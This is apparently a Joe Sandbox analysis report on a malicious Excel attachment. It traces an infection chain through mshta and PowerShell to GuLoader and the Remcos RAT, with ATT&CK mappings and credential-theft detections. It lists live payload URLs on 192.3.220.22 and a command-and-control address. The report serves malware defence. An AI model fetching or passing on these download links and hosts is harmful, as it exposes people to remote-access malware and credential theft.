          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-DSGECX
          Yara detected Remcos RAT
          Source: Yara matchFile source: 00000021.00000002.1004764696.0000000006AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Vaccinerende.exe PID: 3116, type: MEMORYSTR

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity Information1
          Scripting          		Valid Accounts1
          Windows Management Instrumentation          		1
          Scripting          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		13
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts11
          Native API          		1
          DLL Side-Loading          		1
          Access Token Manipulation          		21
          Obfuscated Files or Information          		2
          Credentials in Registry          		1
          Account Discovery          		Remote Desktop Protocol1
          Data from Local System          		21
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Shared Modules          		1
          Registry Run Keys / Startup Folder          		311
          Process Injection          		1
          Install Root Certificate          		1
          Credentials In Files          		3
          File and Directory Discovery          		SMB/Windows Admin Shares21
          Email Collection          		1
          Non-Standard Port          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts13
          Exploitation for Client Execution          		Login Hook1
          Registry Run Keys / Startup Folder          		1
          Software Packing          		NTDS1110
          System Information Discovery          		Distributed Component Object Model3
          Clipboard Data          		1
          Remote Access Software          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud Accounts113
          Command and Scripting Interpreter          		Network Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets11
          Security Software Discovery          		SSHKeylogging2
          Non-Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable Media3
          PowerShell          		RC ScriptsRC Scripts11
          Masquerading          		Cached Domain Credentials21
          Virtualization/Sandbox Evasion          		VNCGUI Input Capture23
          Application Layer Protocol          		Data Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Modify Registry          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Virtualization/Sandbox Evasion          		Proc Filesystem1
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Access Token Manipulation          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
          Process Injection          		Network Sniffing1
          Remote System Discovery          		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 1522508 Sample: PO 11001 .xls Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 124 Suricata IDS alerts for network traffic 2->124 126 Multi AV Scanner detection for submitted file 2->126 128 Yara detected GuLoader 2->128 130 12 other signatures 2->130 13 EXCEL.EXE 57 29 2->13         started        18 powershell.exe 2->18         started        20 powershell.exe 2->20         started        process3 dnsIp4 104 192.3.220.22, 49164, 49166, 49167 AS-COLOCROSSINGUS United States 13->104 106 og1.in 104.21.78.54, 443, 49163, 49168 CLOUDFLARENETUS United States 13->106 94 C:\Users\user\Desktop\PO 11001 .xls (copy), Composite 13->94 dropped 96 C:\Users\...\cookienetbookinetcahce[1].hta, HTML 13->96 dropped 154 Microsoft Office drops suspicious files 13->154 22 mshta.exe 10 13->22         started        26 mshta.exe 13->26         started        28 powershell.exe 18->28         started        30 powershell.exe 20->30         started        file5 signatures6 process7 dnsIp8 98 172.67.216.244, 443, 49165 CLOUDFLARENETUS United States 22->98 100 og1.in 22->100 148 Suspicious command line found 22->148 150 PowerShell case anomaly found 22->150 32 cmd.exe 22->32         started        102 og1.in 26->102 35 cmd.exe 26->35         started        signatures9 process10 signatures11 112 Suspicious powershell command line found 32->112 114 PowerShell case anomaly found 32->114 37 powershell.exe 24 32->37         started        41 powershell.exe 35->41         started        process12 file13 80 C:\Users\user\AppData\Roaming\dllhost.exe, PE32 37->80 dropped 82 C:\Users\user\AppData\...\dllhost[1].exe, PE32 37->82 dropped 84 C:\Users\user\AppData\...\sm41lsyu.cmdline, Unicode 37->84 dropped 140 Installs new ROOT certificates 37->140 142 Powershell drops PE file 37->142 43 dllhost.exe 3 29 37->43         started        47 csc.exe 2 37->47         started        49 dllhost.exe 41->49         started        51 csc.exe 41->51         started        signatures14 process15 file16 88 C:\Users\user\AppData\...\Aerognosy.Res, ASCII 43->88 dropped 152 Suspicious powershell command line found 43->152 53 powershell.exe 3 43->53         started        90 C:\Users\user\AppData\Local\...\sm41lsyu.dll, PE32 47->90 dropped 57 cvtres.exe 47->57         started        59 powershell.exe 49->59         started        92 C:\Users\user\AppData\Local\...\r4gn3nq1.dll, PE32 51->92 dropped 61 cvtres.exe 51->61         started        signatures17 process18 file19 86 C:\Users\user\AppData\...\Vaccinerende.exe, PE32 53->86 dropped 144 Writes to foreign memory regions 53->144 146 Powershell drops PE file 53->146 63 Vaccinerende.exe 53->63         started        67 Vaccinerende.exe 59->67         started        signatures20 process21 dnsIp22 108 107.173.4.16, 2404, 49174, 49175 AS-COLOCROSSINGUS United States 63->108 110 geoplugin.net 178.237.33.50, 49176, 80 ATOM86-ASATOM86NL Netherlands 63->110 116 Detected unpacking (changes PE section rights) 63->116 118 Detected Remcos RAT 63->118 120 Tries to steal Mail credentials (via file registry) 63->120 122 3 other signatures 63->122 69 Vaccinerende.exe 63->69         started        72 Vaccinerende.exe 63->72         started        74 Vaccinerende.exe 63->74         started        76 14 other processes 63->76 signatures23 process24 signatures25 132 Tries to steal Instant Messenger accounts or passwords 69->132 134 Tries to steal Mail credentials (via file / registry access) 69->134 136 Searches for Windows Mail specific files 69->136 138 Tries to harvest and steal browser information (history, passwords, etc) 76->138 78 reg.exe 76->78         started        process26

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO 11001 .xls29%ReversingLabsWin32.Exploit.CVE-2017-0199
          PO 11001 .xls25%VirustotalBrowse
          PO 11001 .xls100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          geoplugin.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://ocsp.entrust.net030%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
          http://geoplugin.net/json.gp0%URL Reputationsafe
          http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
          http://192.3.220.22/0%VirustotalBrowse
          http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%VirustotalBrowse
          https://support.google.com/chrome/?p=plugin_flash0%VirustotalBrowse
          https://og1.in/0%VirustotalBrowse
          http://www.diginotar.nl/cps/pkioverheid00%VirustotalBrowse
          http://192.3.220.22/xampp/en/cookienetbookinetcahce.htahttp://192.3.220.22/xampp/en/cookienetbookine0%VirustotalBrowse
          https://og1.in/2Rxzb30%VirustotalBrowse
          https://login.yahoo.com/config/login0%VirustotalBrowse
          http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaC:0%VirustotalBrowse
          http://www.nirsoft.net/0%VirustotalBrowse
          https://www.google.com0%VirustotalBrowse
          http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta0%VirustotalBrowse
          http://192.3.220.22/430/dllhost.0%VirustotalBrowse
          http://crl.entrust.net/server1.crl00%VirustotalBrowse
          http://www.imvu.com0%VirustotalBrowse
          http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%VirustotalBrowse
          http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaP0%VirustotalBrowse
          http://192.3.220.22/430/dllhost.exe0%VirustotalBrowse
          https://www.google.com/accounts/servicelogin0%VirustotalBrowse
          http://192.3.220.22/430/dllhost.exep0%VirustotalBrowse

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          og1.in
          		104.21.78.54
          		truefalse
            		unknown
            geoplugin.net
            		178.237.33.50
            		truefalseunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://og1.in/2Rxzb3falseunknown
            http://192.3.220.22/hFXELFSwRHRwqbE214.bintrue
              		unknown
              http://192.3.220.22/xampp/en/cookienetbookinetcahce.htatrueunknown
              http://geoplugin.net/json.gpfalse
              • URL Reputation: safe
              		unknown
              http://192.3.220.22/430/dllhost.exetrueunknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://og1.in/2Rxzb3yXmshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                http://192.3.220.22/mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://og1.in/mshta.exe, 00000004.00000002.414718403.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414241682.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471568642.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.460570080.00000000003E5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.471985501.00000000003E4000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://ocsp.entrust.net03mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://og1.in/2Rxzb3Zmshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://contoso.com/Licensepowershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://og1.in/2Rxzb3smshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    https://support.google.com/chrome/?p=plugin_flashVaccinerende.exe, 00000022.00000003.836175427.00000000021E3000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                    http://192.3.220.22/icmshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      http://www.diginotar.nl/cps/pkioverheid0mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://og1.in/2Rxzb3wmshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://go.microspowershell.exe, 00000007.00000002.434786957.0000000002703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002BAA000.00000004.00000800.00020000.00000000.sdmpfalse
                          		unknown
                          https://og1.in/2Rxzb3Cmshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://www.google.comVaccinerende.exefalseunknown
                            http://192.3.220.22/xampp/en/cookienetbookinetcahce.htahttp://192.3.220.22/xampp/en/cookienetbookinemshta.exe, 00000004.00000003.414430980.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.468769729.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470941601.0000000002D35000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                            https://contoso.com/powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.445540287.0000000012531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://login.yahoo.com/config/loginVaccinerende.exefalseunknown
                            http://192.3.220.22/videromshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta9pmshta.exe, 00000004.00000002.417244267.0000000003320000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaC:mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.459453313.0000000003E3C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                https://og1.in/2Rxzb3Wmshta.exe, 0000000F.00000003.460570080.0000000000395000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://www.nirsoft.net/Vaccinerende.exefalseunknown
                                  http://ocsp.entrust.net0Dmshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.434786957.0000000002501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.781549529.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.937693979.0000000002451000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://192.3.220.22/430/dllhost.exe%mpowershell.exe, 00000007.00000002.447277326.000000001A99F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      http://go.crpowershell.exe, 00000007.00000002.449310498.000000001C553000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaMymshta.exe, 0000000F.00000003.471733215.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472196529.0000000003DBC000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://192.3.220.22/430/dllhost.powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                          http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.445540287.0000000012531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          http://crl.entrust.net/server1.crl0mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                          https://og1.in/2Rxzb3&mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://go.microsopowershell.exe, 0000000C.00000002.775886453.00000000001E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://www.imvu.comVaccinerende.exefalseunknown
                                              https://contoso.com/Iconpowershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://nsis.sf.net/NSIS_ErrorErrordllhost.exe, 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, dllhost.exe, 0000000B.00000000.434267277.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000017.00000000.475272548.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, Vaccinerende.exe, 0000001C.00000000.717210149.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Vaccinerende.exe, 00000032.00000000.848787403.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Vaccinerende.exe, 00000039.00000000.901018571.000000000040A000.00000008.00000001.01000000.0000000D.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://og1.in/ketmshta.exe, 00000004.00000002.417244267.000000000332E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://crl.pkioverheid.nl/DomOvLatestCRL.crl0mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaQmshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaPmshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                  https://www.google.com/accounts/serviceloginVaccinerende.exefalseunknown
                                                  http://192.3.220.22/430/dllhost.exeppowershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                                  https://secure.comodo.com/CPS0mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C421000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaFmshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.ebuddy.comVaccinerende.exefalse
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        104.21.78.54
                                                        		og1.inUnited States
                                                        		13335CLOUDFLARENETUSfalse
                                                        192.3.220.22
                                                        		unknownUnited States
                                                        		36352AS-COLOCROSSINGUStrue
                                                        107.173.4.16
                                                        		unknownUnited States
                                                        		36352AS-COLOCROSSINGUStrue
                                                        178.237.33.50
                                                        		geoplugin.netNetherlands
                                                        		8455ATOM86-ASATOM86NLfalse
                                                        172.67.216.244
                                                        		unknownUnited States
                                                        		13335CLOUDFLARENETUSfalse

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1522508
                                                        Start date and time:2024-09-30 09:52:07 +02:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 14m 22s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsofficecookbook.jbs
